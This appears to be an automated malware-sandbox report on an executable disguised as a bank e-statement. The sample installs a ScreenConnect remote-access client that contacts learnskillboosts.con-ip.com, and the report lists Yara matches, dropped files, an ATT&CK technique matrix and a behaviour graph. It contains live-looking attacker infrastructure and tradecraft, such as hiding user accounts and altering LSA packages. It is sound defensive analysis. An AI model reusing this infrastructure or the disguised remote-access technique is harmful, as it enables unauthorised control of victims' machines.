                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exe VolumeInformation
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.Client.dll VolumeInformation
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.Core.dll VolumeInformation
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.Windows.dll VolumeInformation
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformation
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.dll VolumeInformation
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeCode function: 7_2_05EA1340 CreateNamedPipeW,7_2_05EA1340
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeCode function: 7_2_01F74C6E RtlGetVersion,7_2_01F74C6E
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                                  Lowering of HIPS / PFW / Operating System Security Settings

                                  barindex
                                  Source: C:\Windows\System32\msiexec.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa Authentication PackagesJump to behavior
                                  Source: Yara matchFile source: estatement020134230003.exe.virus.exe, type: SAMPLE
                                  Source: Yara matchFile source: 0.2.estatement020134230003.exe.virus.exe.5270000.11.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 8.2.ScreenConnect.WindowsClient.exe.31cfa10.0.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 8.0.ScreenConnect.WindowsClient.exe.d30000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 0.0.estatement020134230003.exe.virus.exe.1095db0.4.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 0.2.estatement020134230003.exe.virus.exe.5270000.11.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 10.2.ScreenConnect.WindowsClient.exe.32afa50.4.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 0.0.estatement020134230003.exe.virus.exe.106c3d4.5.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 0.0.estatement020134230003.exe.virus.exe.fe63d4.2.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 0.0.estatement020134230003.exe.virus.exe.fd0000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 00000008.00000000.1770271715.0000000000D32000.00000002.00000001.01000000.00000011.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000000.00000002.1739173914.0000000005270000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 0000000A.00000002.1832786752.0000000003231000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000008.00000002.3571728405.0000000003151000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000000.00000000.1699653527.0000000000FE6000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                                  Source: Yara matchFile source: Process Memory Space: estatement020134230003.exe.virus.exe PID: 7556, type: MEMORYSTR
                                  Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7772, type: MEMORYSTR
                                  Source: Yara matchFile source: Process Memory Space: ScreenConnect.WindowsClient.exe PID: 8000, type: MEMORYSTR
                                  Source: Yara matchFile source: Process Memory Space: ScreenConnect.WindowsClient.exe PID: 7316, type: MEMORYSTR
                                  Source: Yara matchFile source: C:\Windows\Temp\~DF2437BA2833AB9893.TMP, type: DROPPED
                                  Source: Yara matchFile source: C:\Windows\Temp\~DF19F1C74538568FA2.TMP, type: DROPPED
                                  Source: Yara matchFile source: C:\Windows\Temp\~DF4F6677D5CBA456DC.TMP, type: DROPPED
                                  Source: Yara matchFile source: C:\Windows\Temp\~DFBF7D55DE1B9E3016.TMP, type: DROPPED
                                  Source: Yara matchFile source: C:\Windows\Installer\inprogressinstallinfo.ipi, type: DROPPED
                                  Source: Yara matchFile source: C:\Windows\Temp\~DF76709002D0464E7C.TMP, type: DROPPED
                                  Source: Yara matchFile source: C:\Windows\Temp\~DFD4485B77328D8A3B.TMP, type: DROPPED
                                  Source: Yara matchFile source: C:\Config.Msi\577f6b.rbs, type: DROPPED
                                  Source: Yara matchFile source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\Windows\Installer\MSI8342.tmp, type: DROPPED
                                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                                  Gather Victim Identity InformationAcquire Infrastructure1
                                  Valid Accounts
                                  31
                                  Windows Management Instrumentation
                                  1
                                  DLL Side-Loading
                                  1
                                  DLL Side-Loading
                                  11
                                  Disable or Modify Tools
                                  OS Credential Dumping11
                                  Peripheral Device Discovery
                                  Remote Services11
                                  Archive Collected Data
                                  2
                                  Encrypted Channel
                                  Exfiltration Over Other Network MediumAbuse Accessibility Features
                                  CredentialsDomains1
                                  Replication Through Removable Media
                                  1
                                  Native API
                                  1
                                  DLL Search Order Hijacking
                                  1
                                  DLL Search Order Hijacking
                                  1
                                  Deobfuscate/Decode Files or Information
                                  LSASS Memory1
                                  File and Directory Discovery
                                  Remote Desktop ProtocolData from Removable Media1
                                  Non-Standard Port
                                  Exfiltration Over BluetoothNetwork Denial of Service
                                  Email AddressesDNS ServerDomain Accounts12
                                  Command and Scripting Interpreter
                                  1
                                  Component Object Model Hijacking
                                  1
                                  Component Object Model Hijacking
                                  1
                                  Obfuscated Files or Information
                                  Security Account Manager55
                                  System Information Discovery
                                  SMB/Windows Admin SharesData from Network Shared Drive1
                                  Non-Application Layer Protocol
                                  Automated ExfiltrationData Encrypted for Impact
                                  Employee NamesVirtual Private ServerLocal AccountsCron1
                                  Valid Accounts
                                  1
                                  Valid Accounts
                                  1
                                  Software Packing
                                  NTDS31
                                  Security Software Discovery
                                  Distributed Component Object ModelInput Capture1
                                  Application Layer Protocol
                                  Traffic DuplicationData Destruction
                                  Gather Victim Network InformationServerCloud AccountsLaunchd2
                                  Windows Service
                                  1
                                  Access Token Manipulation
                                  1
                                  Timestomp
                                  LSA Secrets2
                                  Process Discovery
                                  SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                                  Domain PropertiesBotnetReplication Through Removable MediaScheduled Task1
                                  Bootkit
                                  2
                                  Windows Service
                                  1
                                  DLL Side-Loading
                                  Cached Domain Credentials61
                                  Virtualization/Sandbox Evasion
                                  VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items13
                                  Process Injection
                                  1
                                  DLL Search Order Hijacking
                                  DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                                  File Deletion
                                  Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt122
                                  Masquerading
                                  /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                                  Valid Accounts
                                  Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                                  Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
                                  Access Token Manipulation
                                  Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                                  Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task61
                                  Virtualization/Sandbox Evasion
                                  KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
                                  Determine Physical LocationsVirtual Private ServerCompromise Hardware Supply ChainUnix ShellSystemd TimersSystemd Timers13
                                  Process Injection
                                  GUI Input CapturePermission Groups DiscoveryReplication Through Removable MediaEmail CollectionProxyExfiltration over USBNetwork Denial of Service
                                  Business RelationshipsServerTrusted RelationshipVisual BasicContainer Orchestration JobContainer Orchestration Job1
                                  Hidden Users
                                  Web Portal CaptureLocal GroupsComponent Object Model and Distributed COMLocal Email CollectionInternal ProxyCommonly Used PortDirect Network Flood
                                  Identify Business TempoBotnetHardware AdditionsPythonHypervisorProcess Injection1
                                  Bootkit
                                  Credential API HookingDomain GroupsExploitation of Remote ServicesRemote Email CollectionExternal ProxyTransfer Data to Cloud AccountReflection Amplification
                                  Identify RolesWeb ServicesMasquerade as Legitimate ApplicationJavaScriptValid AccountsDynamic-link Library Injection1
                                  Rundll32
                                  Brute ForceCloud GroupsAttack PC via USB ConnectionEmail Forwarding RuleMulti-hop ProxyExfiltration Over Web ServiceEndpoint Denial of Service
                                  Hide Legend

                                  Legend:

                                  • Process
                                  • Signature
                                  • Created File
                                  • DNS/IP Info
                                  • Is Dropped
                                  • Is Windows Process
                                  • Number of created Registry Values
                                  • Number of created Files
                                  • Visual Basic
                                  • Delphi
                                  • Java
                                  • .Net C# or VB.NET
                                  • C, C++ or other language
                                  • Is malicious
                                  • Internet
                                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1569510 Sample: estatement020134230003.exe.... Startdate: 05/12/2024 Architecture: WINDOWS Score: 48 57 learnskillboosts.con-ip.com 2->57 65 Multi AV Scanner detection for submitted file 2->65 67 .NET source code contains potential unpacker 2->67 69 .NET source code references suspicious native API functions 2->69 71 5 other signatures 2->71 8 msiexec.exe 93 48 2->8         started        12 ScreenConnect.ClientService.exe 2 5 2->12         started        15 estatement020134230003.exe.virus.exe 6 2->15         started        17 svchost.exe 1 1 2->17         started        signatures3 process4 dnsIp5 45 ScreenConnect.Wind...dentialProvider.dll, PE32+ 8->45 dropped 47 C:\...\ScreenConnect.WindowsClient.exe, PE32 8->47 dropped 49 C:\...\ScreenConnect.ClientService.exe, PE32 8->49 dropped 53 10 other files (1 malicious) 8->53 dropped 73 Enables network access during safeboot for specific services 8->73 75 Modifies security policies related information 8->75 19 msiexec.exe 8->19         started        21 msiexec.exe 1 8->21         started        23 msiexec.exe 8->23         started        59 learnskillboosts.con-ip.com 195.250.25.144, 49731, 8041 OPTIMITYGB United Kingdom 12->59 77 Reads the Security eventlog 12->77 79 Reads the System eventlog 12->79 25 ScreenConnect.WindowsClient.exe 12->25         started        28 ScreenConnect.WindowsClient.exe 2 12->28         started        51 estatement020134230003.exe.virus.exe.log, ASCII 15->51 dropped 81 Contains functionality to hide user accounts 15->81 30 msiexec.exe 6 15->30         started        61 127.0.0.1 unknown unknown 17->61 file6 signatures7 process8 file9 33 rundll32.exe 11 19->33         started        83 Creates files in the system32 config directory 25->83 85 Contains functionality to hide user accounts 25->85 55 C:\Users\user\AppData\Local\...\MSI76AF.tmp, PE32 30->55 dropped signatures10 process11 file12 37 C:\Users\user\...\ScreenConnect.Windows.dll, PE32 33->37 dropped 39 C:\...\ScreenConnect.InstallerActions.dll, PE32 33->39 dropped 41 C:\Users\user\...\ScreenConnect.Core.dll, PE32 33->41 dropped 43 4 other files (none is malicious) 33->43 dropped 63 Contains functionality to hide user accounts 33->63 signatures13

                                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                                  windows-stand
                                  SourceDetectionScannerLabelLink
                                  estatement020134230003.exe.virus.exe18%ReversingLabsWin32.Exploit.ScreenConnectTool
                                  SourceDetectionScannerLabelLink
                                  C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.Client.dll0%ReversingLabs
                                  C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.dll0%ReversingLabs
                                  C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exe0%ReversingLabs
                                  C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.Core.dll0%ReversingLabs
                                  C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.Windows.dll0%ReversingLabs
                                  C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsAuthenticationPackage.dll0%ReversingLabs
                                  C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsBackstageShell.exe0%ReversingLabs
                                  C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exe0%ReversingLabs
                                  C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsCredentialProvider.dll0%ReversingLabs
                                  C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsFileManager.exe0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\MSI76AF.tmp0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\MSI76AF.tmp-\Microsoft.Deployment.Compression.Cab.dll0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\MSI76AF.tmp-\Microsoft.Deployment.Compression.dll0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\MSI76AF.tmp-\Microsoft.Deployment.WindowsInstaller.Package.dll0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\MSI76AF.tmp-\Microsoft.Deployment.WindowsInstaller.dll0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\MSI76AF.tmp-\ScreenConnect.Core.dll0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\MSI76AF.tmp-\ScreenConnect.InstallerActions.dll0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\MSI76AF.tmp-\ScreenConnect.Windows.dll0%ReversingLabs
                                  C:\Windows\Installer\MSI8362.tmp0%ReversingLabs
                                  C:\Windows\Installer\MSI8567.tmp0%ReversingLabs
                                  No Antivirus matches
                                  No Antivirus matches
                                  SourceDetectionScannerLabelLink
                                  http://wixtoolset.org/Whttp://wixtoolset.org/telemetry/v0%Avira URL Cloudsafe
                                  http://wixtoolset.org/releases/0%Avira URL Cloudsafe
                                  http://wixtoolset.org/news/0%Avira URL Cloudsafe
                                  NameIPActiveMaliciousAntivirus DetectionReputation
                                  learnskillboosts.con-ip.com
                                  195.250.25.144
                                  truetrue
                                    unknown
                                    NameSourceMaliciousAntivirus DetectionReputation
                                    http://www.apache.org/licenses/LICENSE-2.0ScreenConnect.WindowsClient.exe, 00000008.00000002.3589725523.000000001DAE2000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://www.fontbureau.comScreenConnect.WindowsClient.exe, 00000008.00000002.3589725523.000000001DAE2000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://www.fontbureau.com/designersGScreenConnect.WindowsClient.exe, 00000008.00000002.3589725523.000000001DAE2000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          http://www.fontbureau.com/designers/?ScreenConnect.WindowsClient.exe, 00000008.00000002.3589725523.000000001DAE2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://www.founder.com.cn/cn/bTheScreenConnect.WindowsClient.exe, 00000008.00000002.3589725523.000000001DAE2000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://www.fontbureau.com/designers?ScreenConnect.WindowsClient.exe, 00000008.00000002.3589725523.000000001DAE2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://wixtoolset.org/Whttp://wixtoolset.org/telemetry/vrundll32.exe, 00000004.00000003.1729285999.0000000004EFB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1729474688.0000000004D83000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1729285999.0000000004E8C000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.WindowsInstaller.dll.4.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.4.dr, Microsoft.Deployment.Compression.dll.4.dr, Microsoft.Deployment.Compression.Cab.dll.4.drfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://docs.rs/getrandom#nodejs-es-module-supportScreenConnect.WindowsCredentialProvider.dll.2.drfalse
                                                  high
                                                  http://crl.ver)svchost.exe, 00000009.00000002.3446658383.000001470E064000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    http://www.tiro.comScreenConnect.WindowsClient.exe, 00000008.00000002.3589725523.000000001DAE2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://g.live.com/odclientsettings/ProdV2.C:edb.log.9.dr, qmgr.db.9.drfalse
                                                        high
                                                        http://www.fontbureau.com/designersScreenConnect.WindowsClient.exe, 00000008.00000002.3589725523.000000001DAE2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://wixtoolset.org/news/rundll32.exe, 00000004.00000003.1729285999.0000000004EFB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1729474688.0000000004D83000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1729285999.0000000004E8C000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.WindowsInstaller.dll.4.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.4.dr, Microsoft.Deployment.Compression.dll.4.dr, Microsoft.Deployment.Compression.Cab.dll.4.drfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://www.goodfont.co.krScreenConnect.WindowsClient.exe, 00000008.00000002.3589725523.000000001DAE2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://www.carterandcone.comlScreenConnect.WindowsClient.exe, 00000008.00000002.3589725523.000000001DAE2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              http://www.sajatypeworks.comScreenConnect.WindowsClient.exe, 00000008.00000002.3589725523.000000001DAE2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                http://www.typography.netDScreenConnect.WindowsClient.exe, 00000008.00000002.3589725523.000000001DAE2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://g.live.com/odclientsettings/Prod.C:edb.log.9.dr, qmgr.db.9.drfalse
                                                                    high
                                                                    http://www.fontbureau.com/designers/cabarga.htmlNScreenConnect.WindowsClient.exe, 00000008.00000002.3589725523.000000001DAE2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://www.founder.com.cn/cn/cTheScreenConnect.WindowsClient.exe, 00000008.00000002.3589725523.000000001DAE2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://www.galapagosdesign.com/staff/dennis.htmScreenConnect.WindowsClient.exe, 00000008.00000002.3589725523.000000001DAE2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://wixtoolset.org/releases/rundll32.exe, 00000004.00000003.1729285999.0000000004EFB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1729474688.0000000004D83000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1729285999.0000000004E8C000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.WindowsInstaller.dll.4.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.4.dr, Microsoft.Deployment.Compression.dll.4.dr, Microsoft.Deployment.Compression.Cab.dll.4.drfalse
